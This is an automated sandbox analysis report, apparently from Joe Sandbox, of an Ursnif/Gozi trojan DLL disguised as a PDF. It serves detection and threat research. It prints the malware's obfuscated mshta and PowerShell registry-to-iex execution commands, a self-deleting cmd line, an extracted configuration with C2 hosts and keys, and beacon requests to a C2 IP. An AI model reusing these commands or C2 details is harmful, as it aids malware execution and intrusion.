Windows Analysis Report
626a97fea05c8.pdf.dll

Overview

General Information

Sample Name: 626a97fea05c8.pdf.dll
Analysis ID: 617386
MD5: 76f9a5c65f372960c55a3e2d19d211cb
SHA1: 341d52557b6600d3e3fe30a43de94206eb4e4403
SHA256: 713cfe3bc8dd8f8ba3b907d9268d3f4bd40f5a6a681653cc7922bf69a754ee5a
Tags: dll, gozi_ifsb, ursnif, 3000

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Snort IDS alert for network traffic
Found malware configuration
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Suspicious Remote Thread Created
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6592 cmdline: loaddll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6612 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3340 cmdline: rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5008 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3688 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 4920 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 6176 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4504 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 5140 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3120 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3068 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2268 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2140 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
{"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings
00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Source | Rule | Description | Author | Strings
4.2.rundll32.exe.ef0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.3.rundll32.exe.48e94a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.3.rundll32.exe.48e94a0.10.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.3.rundll32.exe.4dca4a0.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.3.rundll32.exe.4dca4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

System Summary

Source: File created, Author: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 5140, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Source: Threat created, Author: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6636, StartAddress: 424A1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3688
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5140, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6636, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6612, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, ProcessId: 3340, ProcessName: rundll32.exe
Source: Threat created, Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6636, StartAddress: 424A1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3688
Source: Process started, Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5140, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6636, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6636, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline, ProcessId: 3120, ProcessName: csc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5140, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6636, ProcessName: powershell.exe
Source: Process started, Author: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6636, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 1300, ProcessName: conhost.exe
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6636, TargetFilename: C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132956597262145556.6636.DefaultAppDomain.powershell

Data Obfuscation

Source: Process started, Author: Joe Security: Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 6592, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1, ProcessId: 6612, ProcessName: cmd.exe

Timestamp: 04/28/22-15:48:15.506658
SID: 2033203
Source Port: 49745
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 04/28/22-15:48:37.609595
SID: 2033203
Source Port: 49750
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: Ursnif (configuration identical to the one listed above)
Source: 626a97fea05c8.pdf.dll, Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_00EF5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: 626a97fea05c8.pdf.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.534897078.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.540095400.0000000005D70000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb source: 626a97fea05c8.pdf.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000004.00000003.534897078.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.540095400.0000000005D70000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_008EFD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_008E99BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_008FBAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_008E65C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,

Networking

Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 94.140.115.8 80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49745 -> 13.107.42.16:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49750 -> 94.140.115.8:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49750 -> 94.140.115.8:80
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: global traffic, HTTP traffic detected: GET /drew/LtgGoR4W/2VkXik7fjDcVktkLvg4IApw/X92UzCdVgy/XGxL6WnODxABmAmav/eQYJObhAwpfD/VdmVLoyMEHz/dwiltyOKA4QHrd/HIJmqKTpq7hYAhh7xdD_2/BebjcoubFQh657nc/ksw26clyZ6v7ljU/oLbDPDTt1qYXqZfF_2/Fct2ocSBw/YaWKTOq17vIwu56czhmj/mDU1dku9eqq5aKu5F_2/FjqClysn2ko_2Fsx8SaFZF/ugZkpFnnMo_2B/poGcHSuZrc7hSygj/D8.jlk HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0), Host: 94.140.115.8, Connection: Keep-Alive, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7sRLB3A_2FAgFg0G/a5El_2BO7WD36Nlp/el4uE7tHR4Z8M9p/QG4TJaEWODl3HaYCH4/kP01txLgC/1iGXgYXBwcTcIgoIP92G/0JSXT0rNb0xnVvZFyXY/gCk_2F7aTYUhOqcRrdrBn4/EZOQnHcHRUgv3/B5BfYkj9/KpyjZ64W8U3keBpCjw85kZ4/8t_2Bri7RNBUNE3Y/8jsFDn.jlk HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0), Host: 94.140.115.8, Connection: Keep-Alive, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2BfvJx7dx/1hlTGDAg0PRAb8RWrNXa/OnwJqcZ0UkVEA4nNNEX/rU_2BEpbIQ3L_2FTXhvUWT/8ZfWEtxix63AY/iFey05B2/gKLIqEyGvdF_2FQqfOcIngQ/d4nr47OKVK/s16bIA5z3PH2z3706/OF3C_2BAmDzq/p9S3fF0IaVA/8GI4MffuRsVQDp/0oN_2BdvJJV7wESzGZsla/_2FLi.jlk HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0), Host: 94.140.115.8, Connection: Keep-Alive, Cache-Control: no-cache
Source: Joe Sandbox View, ASN Name: NANO-ASLV NANO-ASLV
Source: rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.484931733.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://94.140.115.8/37
Source: rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://94.140.115.8/drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7
Source: rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://94.140.115.8/drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2
Source: rundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000012.00000003.500324132.00000182D8F5C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_00EF1CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
Source: unknown, TCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara matchFile source: 00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424606218.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.472906954.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
